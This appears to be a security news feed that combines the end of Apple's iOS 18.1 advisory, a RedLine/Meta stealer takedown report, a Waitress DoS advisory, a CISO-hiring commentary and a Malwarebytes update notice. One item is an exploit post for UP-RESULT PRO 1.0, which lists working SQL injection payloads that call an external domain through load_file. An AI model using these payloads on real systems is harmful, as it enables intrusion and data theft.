later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: A remote attacker may be able to break out of Web ContentsandboxDescription: A custom URL scheme handling issue was addressed withimproved input validation.CVE-2024-40867: Ziyi Zhou (@Shanghai Jiao Tong University), Tianxiao Hou(@Shanghai Jiao Tong University)KernelAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An app may be able to leak sensitive kernel stateDescription: An information disclosure issue was addressed with improvedprivate data redaction for log entries.CVE-2024-44239: Mateusz Krzywicki (@krzywix)Managed ConfigurationAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Restoring a maliciously crafted backup file may lead tomodification of protected system filesDescription: This issue was addressed with improved handling ofsymlinks.CVE-2024-44258: Hichem Maloufi, Christian Mina, Ismail AmzdakMobileBackupAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Restoring a maliciously crafted backup file may lead tomodification of protected system filesDescription: A logic issue was addressed with improved file handling.CVE-2024-44252: Nimrat Khalsa, Davis Dai, James Gill(@jjtech@infosec.exchange)Pro ResAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An app may be able to cause unexpected system termination orcorrupt kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2024-44277: an anonymous researcher and Yinyi Wu(@_3ndy1) from DawnSecurity Lab of JD.com, Inc.Safari DownloadsAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An attacker may be able to misuse a trust relationship todownload malicious contentDescription: This issue was addressed through improved state management.CVE-2024-44259: Narendra Bhati, Manager of Cyber Security at Suma SoftPvt. Ltd, Pune (India)Safari Private BrowsingAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Private browsing may leak some browsing historyDescription: An information leakage was addressed with additionalvalidation.CVE-2024-44229: Lucas Di TomaseSceneKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing a maliciously crafted file may lead to heapcorruptionDescription: This issue was addressed with improved checks.CVE-2024-44218: Michael DePlante (@izobashi) of Trend Micro Zero DayInitiativeShortcutsAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: This issue was addressed with improved redaction ofsensitive information.CVE-2024-44254: Kirin (@Pwnrin)ShortcutsAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: A malicious app may use shortcuts to access restricted filesDescription: A logic issue was addressed with improved checks.CVE-2024-44269: an anonymous researcherSiriAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: This issue was addressed with improved redaction ofsensitive information.CVE-2024-44194: Rodolphe Brunetti (@eisw0lf)SiriAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An attacker with physical access may be able to access contactphotos from the lock screenDescription: This issue was addressed by restricting options offered ona locked device.CVE-2024-40851: Abhay Kailasia (@abhay_kailasia) of Lakshmi NarainCollege of Technology Bhopal India, Srijan PoudelSiriAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An app may be able to access user-sensitive dataDescription: A logic issue was addressed with improved state management.CVE-2024-44263: Kirin (@Pwnrin) and 7feileeSiriAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: A sandboxed app may be able to access sensitive user data insystem logsDescription: An information disclosure issue was addressed with improvedprivate data redaction for log entries.CVE-2024-44278: Kirin (@Pwnrin)SpotlightAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An attacker may be able to view restricted content from the lockscreenDescription: This issue was addressed through improved state management.CVE-2024-44251: Abhay Kailasia (@abhay_kailasia) of Lakshmi NarainCollege of Technology Bhopal IndiaSpotlightAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An attacker may be able to view restricted content from the lockscreenDescription: The issue was addressed with improved checks.CVE-2024-44235: Rizki Maulana (rmrizki.my.id), Dalibor Milanovic,Richard Hyunho Im (@richeeta) with Route Zero SecurityVoiceOverAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: An attacker may be able to view restricted content from the lockscreenDescription: This issue was addressed by restricting options offered ona locked device.CVE-2024-44261: Braylon (@softwarescool)WebKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing maliciously crafted web content may prevent ContentSecurity Policy from being enforcedDescription: The issue was addressed with improved checks.WebKit Bugzilla: 278765CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma SoftPvt. Ltd, Pune (India)WebKitAvailable for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch3rd generation and later, iPad Pro 11-inch 1st generation and later,iPad Air 3rd generation and later, iPad 7th generation and later, andiPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to anunexpected process crashDescription: A memory corruption issue was addressed with improved inputvalidation.WebKit Bugzilla: 279780CVE-2024-44244: an anonymous researcher, Q1IQ (@q1iqF) and P1umer(@p1umer)Additional recognitionAccessibilityWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) of LakshmiNarain College of Technology Bhopal India, Chi Yuan Chang of ZUSO ARTand taikosoup for their assistance.App StoreWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) of LakshmiNarain College of Technology Bhopal India, Chi Yuan Chang of ZUSO ARTand taikosoup for their assistance.CalculatorWe would like to acknowledge Kenneth Chew for their assistance.CalendarWe would like to acknowledge  K宝(@Pwnrin) for their assistance.CameraWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) of LakshmiNarain College of Technology Bhopal India for their assistance.FilesWe would like to acknowledge Chi Yuan Chang of ZUSO ART and taikosoup,Christian Scalese for their assistance.ImageIOWe would like to acknowledge Amir Bazine and Karsten König ofCrowdStrike Counter Adversary Operations, an anonymous researcher fortheir assistance.MessagesWe would like to acknowledge Collin Potter, an anonymous researcher fortheir assistance.NetworkExtensionWe would like to acknowledge Patrick Wardle of DoubleYou & theObjective-See Foundation for their assistance.Personalization ServicesWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) of LakshmiNarain College of Technology Bhopal India, Bistrit Dahal for theirassistance.PhotosWe would like to acknowledge James Robertson, Kamil Bourouiba for theirassistance.Safari Private BrowsingWe would like to acknowledge an anonymous researcher, r00tdaddy fortheir assistance.Safari TabsWe would like to acknowledge Jaydev Ahire for their assistance.SecurityWe would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai ofAlibaba Group for their assistance.SettingsWe would like to acknowledge Chi Yuan Chang of ZUSO ART and taikosoup,JS for their assistance.SiriWe would like to acknowledge Bistrit Dahal for their assistance.SpotlightWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) from LNCTBhopal and C-DAC Thiruvananthapuram India for their assistance.Time ZoneWe would like to acknowledge Abhay Kailasia (@abhay_kailasia) of LakshmiNarain College of Technology Bhopal India and Siddharth Choubey fortheir assistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/iTunes and Software Update on the device will automatically checkApple's update server on its weekly schedule. When an update isdetected, it is downloaded and the option to be installed ispresented to the user when the iOS device is docked. We recommendapplying the update immediately if possible. SelectingDon't Install will present the option the next time you connectyour iOS device.The automatic update process may take up to a week depending onthe day that iTunes or the device checks for updates. You maymanually obtain the update via the Check for Updates buttonwithin iTunes, or the Software Update on your device.To check that the iPhone, iPod touch, or iPad has been updated:* Navigate to Settings* Select General* Select About. The version after applying this update will be"iOS 18.1 and iPadOS 18.1".All information is also posted on the Apple Security Releasesweb site: https://support.apple.com/100100.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcf/dUACgkQX+5d1TXaIvqm0BAApx/I4XTM2+r/UgcEZEbgh0EpJ1eAh4YUjhhfju7hcytJK5hFtXAWoOr8n9ZBIWz2ulzpXnjFkP6NySC6gyPPeF0Mb3TjWcUz9HaSwbscaLaHQOMSHs5+g6npuJreJ0oC3HS1YQiBAuHcjgg/v9QWqP33osue2gF40ywGTfmjIQp1W8Pgm9iUIIiV2whN5M0UWUg4ioxkCI5wol9cE6HYsD38u45RuqkBNa1DEOta4rpHK8t+Tku7nqKP0aH3EPyahxvW5mTG1f0M5yesYrf5xA7XCnwelvHLan+FmtxiCCtlzAyrIeDrut27oBJNN9ypoMC0h9wz8lNw2Z8r/8OzSGBhmQOaIFs3aFDck2k/itvaYscCIZp1hwcU3sQ14mygrxJQCzRJt2P0WNZDQEN3z8qTMfPa22w+0CfjzavCeqJBUAPcz9lVLqzs6wrssaK/MbKA1MleFY1UcfxEPKr2jJ/c1zwxG32OsHowHyYhcrWlURIQO3onCdcDY664cEelaOlm+PkDUY+AWOOOTGB/UpV7JzRFl6oG6VqFFyigd7ukYnZ6R6gRwmhzF13x3VrrynWuQfuuc5nFNI+6K19tjqX6O9p+5bUcK5Pmrs3EglWd3OLIauWLcy4oJGe0KeD70kWoXDCwHFzTQl3MwdMmxAJomsjEUre1ghUifCc/vDs==1SoX-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-1

UP-RESULT PRO version 1.0 suffers from a remote SQL injection vulnerability.

    ## Titles: UP-RESULT[pro-1.0] Multiple-SQLi## Author: nu11secur1ty## Date: 10/28/2024## Vendor: https://mayurik.com/## Software:https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download## Reference: https://portswigger.net/web-security/sql-injection## Description:The `nid` parameter appears to be vulnerable to SQL injection attacks. Thepayload '+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+' wassubmitted in the nid parameter. This payload injects a SQL sub-query thatcalls MySQL's load_file function with a UNC file path that references a URLon an external domain. The application interacted with that domain,indicating that the injected SQL query was executed. The attacker can getall sensitive information from this system when he attacks it online!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: nid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: nid=2'+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' OR NOT9142=9142 AND 'bbjg'='bbjg    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: nid=2'+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'';SELECTSLEEP(7)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: nid=2'+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' AND(SELECT 9083 FROM (SELECT(SLEEP(7)))YMvG) AND 'jiLE'='jiLE    Type: UNION query    Title: MySQL UNION query (NULL) - 3 columns    Payload: nid=2'+(select load_file('\\\\p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' UNION ALLSELECTNULL,CONCAT(0x7178767871,0x6467686f7670716c49467649584a4744416775554961485747416c4b724977454f75787267707268,0x7162627a71),NULL,NULL#---```## Reproduce:[href](https://www.patreon.com/posts/up-result-pro-1-114856979)## Demo PoC:[href](https://www.nu11secur1ty.com/2024/10/up-resultpro-10-multiple-sqli.html)## Time spent:01:27:00

UP-RESULT PRO 1.0 SQL Injection

A collaboration with the FBI and law-enforcement agencies in Europe, the UK, and Australia, Operation Magnus has seized servers and source code related to the two malware families, which have stolen data from millions of victims worldwide.

Source: JVPhoto via Alamy Stock Photo

The FBI in collaboration with various international law-enforcement agencies has seized the servers and source code for the RedLine and Meta stealers as part of Operation Magnus, and US authorities have charged one of RedLine's developers with various crimes. The stealers are responsible for the theft of millions of unique credentials from international victims, authorities said.

The intelligence bureau and the US Department of Justice (DoJ) are among several international agencies — including Dutch National Police, Belgian Federal Police, Belgian Federal Prosecutor’s Office, UK National Crime Agency, Australian Federal Police, Portuguese Federal Police, and Eurojust — that on Oct. 28 disrupted the operation of the cybercriminal group behind the stealers, which authorities claim are "pretty much the same" malware in a video posted on the operation's website.

Investigations into RedLine and Meta started after authorities learned about the potential of servers in the Netherlands being linked to the malware, according to a press statement by the European Union Agency for Criminal Justice Cooperation. Investigators went on to discover that more than 1,200 servers in dozens of countries were running the stealers.

Authorities eventually collected victim log data stolen from computers infected with RedLine and Meta, identifying millions of unique usernames and passwords, as well as email addresses, bank accounts, cryptocurrency addresses, and credit card numbers that have been stolen by various malware operators. Moreover, the DoJ believes that there is still more stolen data to be recovered, it said in a press statement on Operation Magnus.

Law enforcement also seized source code for RedLine and Meta as well as REST-API servers, panels, stealers, and Telegram bots that were being used to distribute the stealers to cybercriminals. Both malwares are typically are sold via cybercrime forums and through Telegram channels that offer customer support and software updates.

**RedLine Developer Charged by the DoJ**

As part of the US operation, the DoJ has charged Maxim Rudometov, one of the developers and administrators of RedLine, with access device fraud, conspiracy to commit computer intrusion, and money laundering. If convicted, Rudometov faces a maximum penalty of 10 years in prison for access device fraud, five years in prison for conspiracy to commit computer intrusion, and 20 years in prison for money laundering.

The DoJ also unsealed a warrant issued in the Western District of Texas that authorized law enforcement to seize two domains used by RedLine and Meta for command and control (C2). Dutch police also took down three servers associated with the stealers in the Netherlands, and two more people associated with the criminal activity were taken into custody in Belgium.

Assistant US Attorney G. Karthik Srinivasan is prosecuting the case in the US, while the investigation in Texas is being conducted by the FBI Austin Cyber Task Force, which includes the Naval Criminal Investigative Service, IRS Criminal Investigation, Defense Criminal Investigative Service, and Army Criminal Investigation Division, among other agencies.

**Widespread Stealer Distribution**

RedLine Stealer is a malware-as-a-service (MaaS) platform sold via Telegram and online hacker forums that targets browsers to collect various data saved by the user, including credentials and payment card details. It can also take a system inventory to assess the attack surface for further attacks. 

To that end, RedLine also can perform other malicious functions, such as uploading and downloading files, and executing commands. Meta meanwhile is basically a clone of RedLine that performs similar functions and also operates through an MaaS model.

Because of their widespread availability, both stealers have been used by threat actors with various levels of sophistication. Advanced actors have distributed the stealers as an initial vector upon which to perform further nefarious activity, such as delivering ransomware, while unsophisticated actors have used one or the other of the stealers to get into the cybercriminal game to steal credentials. Those credentials are often sold to other cybercriminals on the Dark Web to continue the cycle of cybercrime.

One popular way cybercriminals have distributed the stealers is to hide them behind Facebook ads, including ones promoting AI chatbots like ChatGPT and Google Bard. Other attack vectors have used phishing to embed the stealers in malicious files or links attached to emails.

International authorities plan to continue their investigations into the criminals using data stolen by the infostealers. For people concerned they may have been criminalized by RedLine and/or Meta, ESET is offering an online tool to allow people to check to see if their data was stolen and what steps they should take if it has.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

FBI, Partners Disrupt RedLine, Meta Stealer Operations

### Impact

When a remote client closes the connection before waitress has had the opportunity to call `getpeername()` waitress won't correctly clean up the connection leading to the main thread attempting to write to a socket that no longer exists, but not removing it from the list of sockets to attempt to process. This leads to a busy-loop calling the write function.

A remote attacker could run waitress out of available sockets with very little resources required.

### Patches

Waitress 3.0.1 contains fixes that remove the race condition.

### Workarounds

No work-around.

### References

- https://github.com/Pylons/waitress/issues/418
- https://github.com/Pylons/waitress/pull/435


**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-3f84-rpwh-47g6: Waitress vulnerable to DoS leading to high CPU usage/resource exhaustion

Great CISOs are in short supply, so choose wisely. Here are five ways to make sure you've made the right pick.

Source: Borka Kiss via Alamy Stock Photo

COMMENTARY

The artificial intelligence (AI) investment cycle we are currently in will drive new levels of cybersecurity risk in pretty much every organization, making the cybersecurity chief a CEO's most important current hire. Great chief information security officers (CISOs) — who blend technical, strategic, board-level communication, and leadership skills — are in high demand and short supply, and with technology constantly changing, the cybersecurity skill set is changing, too.  

**Attracting the Best**

How do CEOs, their executive teams, and their HR partners attract the best of the market? Here are a few ways.  

1\. Level and structure the role appropriately: If security — of enterprise data, customer information, or data right in the product itself — is so critical to your organization that one mishap can have a major impact on your revenues, then give the role some teeth. Don't bury it under IT operations, where you will attract a technologist, not a leader. Either have the CISO report to the chief information officer (who, in turn, should be reporting to the CEO given the critically of technology to your business) or make the CISO a CIO peer. If your security risk is less life threatening, and your CIO has depth in security, you can consider moving them down a layer. Is the CISO responsible for enterprise security or product security or both? Will the CISO have a small matrixed organization or a larger dedicated team?  While the right CISO will help you answer some of the questions, the more thoughtful you’ve been about these questions ahead of time, the better.  

2\. Educate your board: Public company boards do not yet fully understand their role in cyber governance. They often equate security to technology and tools rather than emphasizing the human behavior side of cyber incidents. While the board does not need to know the latest tools, they should understand what truly lies behind cyber incidents and how they should govern. By showing that you've primed the pump, and your CIO has been bringing the board up to speed on the risks and return of digital technologies, you are demonstrating a tech-savvy board. The market’s best CISO will see a savvy board as a requirement.  

3\. Think about both defensive and offensive tactics: The best CISOs will balance the defensive and offensive postures of information security. They will see the cyber role as both facilitating the growth of the business and securing it from cyber-risk. Show these rare birds that your board, executive committee, and CIO understand that technology must be a strategic advantage, not an unfortunate cost. Do your discussions about IT focus on expense only, or are your IT investments clearly aligned to your business value streams? Does your CEO talk in company meetings about how important technology is to the growth of the company? The quality of the CISO you can attract depends on our view of the impact of technology on your business.  

4\. Build and demonstrate a change management capability: People resist change, particularly if they do not perceive value in the change. Getting a large organization to follow security protocols takes a tremendous amount of adoption effort and change management. The better your organization is at driving the right behaviors in your employee base, the stronger your security program. During your candidate interviews, extoll the virtues of your change management team and your executive committee's understanding that good security is about culture, behaviors, education, and change. In fact, "change management" is quickly becoming the most important skill set of any technology leader, CISOs included.  

5\. Involve the board in the interview process: Actions speak louder than words, and a few board interviews will demonstrate to your CISO finalist that you and the board take cybersecurity seriously. It will also allow the CISO to assess his or her dynamic with the board. The board-CISO relationship is only going to be become more important, so getting an early read on that relationship will help ensure that it will work.   

With every dime we spend on AI, we produce risk. With every new Internet of Things (IoT) product we sell, we open a cybersecurity door. With every day that passes, our cyber foes are getting smarter. CEOs and their teams have a powerful weapon to fight these forces: the ability to attract the right CISO. While most companies have a head of security, these professionals are not all created equal. Some are "tool jockeys" who love technology but not people; then there are the CISOs with great regulatory knowledge but lacking great influencing skills. When you identify the right blend of technical, communication, and leadership skills, by showing your candidates know that you are serious about cybersecurity, you can make the right hire.  

**About the Author**

CEO, Heller Search

Martha Heller is a widely followed thought leader on technology leadership talent, and CEO of Heller Search, a premier technology executive search firm. Over the course of her career, Martha has become an authoritative voice on technology leadership and executive search. She has recruited hundreds of chief information officers (CIOs), chief technology officers (CTOs), architects, and other senior technology positions, and become a trusted adviser to executives around the country.

How to Find the Right CISO

Apple has issued patches for several of its operating systems. The ones for iOS and iPadOS deserve your immediate attention.

Apple has released security patches for most of its operating systems, including iOS, Mac, iPadOS and watchOS.

Especially important are the updates for iOS and iPadOS which tackle vulnerabilities which could potentially leak sensitive user information. You should make sure you update as soon as you can.

To check if you’re using the latest software version, go to **Settings > General > Software Update**. It’s also worth turning on Automatic Updates if you haven’t already, which you can do on the same screen.

Update options

**Technical details**

Noteworthy are four vulnerabilities in Siri and another vulnerability in Accessibility which would allow an attacker with physical access to view sensitive user information. This may not seem very urgent at first, but if your device gets stolen then the thief can learn things about you which is far from ideal.

These are some of the vulnerabilities that jumped out at us.

CVE-2024-44274: a vulnerability in Accessibility that could allow an attacker with physical access to a locked device to view sensitive user information. This issue is fixed in iOS 17.7.1 and iPadOS 17.7.1, watchOS 11.1, iOS 18.1 and iPadOS 18.1 with improved authentication.

CVE-2024-44282: a vulnerability in Foundation where parsing a file could lead to disclosure of user information. This issue is fixed in tvOS 18.1, iOS 18.1 and iPadOS 18.1, iOS 17.7.1 and iPadOS 17.7.1, macOS Ventura 13.7.1, macOS Sonoma 14.7.1, watchOS 11.1, visionOS 2.1 by improved input validation. Foundation serves as a fundamental framework that offers a base layer of functionality for Apple’s operating systems. Among others it’s responsible for file system access.

CVE-2024-40867: a vulnerability in iTunes caused by a custom URL scheme handling issue that could be used by an attacker to break out of Web Content sandbox. This issue is fixed in iOS 18.1 and iPadOS 18.1 by improved input validation. Breaking out of the Web Content sandbox allows a malicious website or attacker to potentially access sensitive data, control other parts of the system, and compromise the overall security of the device beyond the intended limitations of the web browser.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Tag

#auth